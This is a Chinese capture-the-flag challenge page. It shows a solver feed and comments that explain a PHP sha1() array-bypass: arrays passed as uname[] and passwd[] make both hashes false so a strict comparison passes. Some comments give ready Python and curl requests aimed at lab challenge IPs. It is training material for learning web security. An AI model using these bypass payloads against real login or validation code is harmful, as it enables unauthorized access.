评分(5)
解题动态
tonghow 攻破了该题 9小时前
z231288 攻破了该题 16小时前
纳猫猫 攻破了该题 18小时前
billy856 攻破了该题 18小时前
rschei7 攻破了该题 20小时前
byj 攻破了该题 22小时前
zwx1998 攻破了该题 1天前
小鱼牌西红柿 攻破了该题 1天前
gfgfgf 攻破了该题 1天前
abccc 攻破了该题 1天前
w84jhjfa9 攻破了该题 2天前
heinic 攻破了该题 2天前
yiyiyiyi0108 攻破了该题 2天前
CN19169645762 攻破了该题 2天前
f发条橙1515 攻破了该题 2天前
白嘎力 攻破了该题 2天前
bbb.. 攻破了该题 2天前
tay 攻破了该题 2天前
刘猛 攻破了该题 2天前
评论
YANGLINSHENG2503940126 4天前
举报
import requests url = "http://160.202.254.160:18387 id=%6d%61%72%67%69%6e&uname[]=1" data = {"passwd[]": "2"} res = requests.post(url, data=data) print(res.text)
WWls= 25天前
举报
?uname[]=1&id=margin POST:passwd[]=2
脚本gay 3月前
举报
解题关键:PHP SHA1 函数漏洞 PHP 中,sha1() 函数无法处理数组,传入数组会返回 false,且是强类型的 false。 sha1(array()) → false sha1(array(1)) → false 两个不同数组,sha1 结果都是 false,满足 === 强相等 同时,数组和数组在 == 弱比较中不相等,完美绕过第一层判断!
是小白鸭 4月前
举报
明白咯 要在bp的repeater里面修改,get请求在头部,post请求在尾部。
奔跑的开开 7月前
举报
hackbar构造?uname[]=1&id=margin(get) ,passwd[]=2(post)
qq1002517 4月前
举报
6
5883120xly 8月前
举报
在url上加/?id=margin&uname[]=111a 在POST中加passwd[]=2
lwgzs 8月前
举报
curl -d '
dbcjmc 8月前
举报
这题其实很简单,要掌握MD5== 与===的特性就能轻松绕过去,在hackbar我们先传入get的?id=margin&uname[]=1然后再post传入passwd[]=2数组里面什么值都行===遇到数组都是null所以满足条件
zxcvbnmzhang 10月前
举报
curl -X POST "http://117.72.52.127:16987/?uname[]=a&id=margin" -d "passwd[]=b"
asddddd 10月前
举报
我用0e绕过sha1为啥不行,为什么只能数组绕过
ShawnWang04 8月前
举报
因为是=== 不是==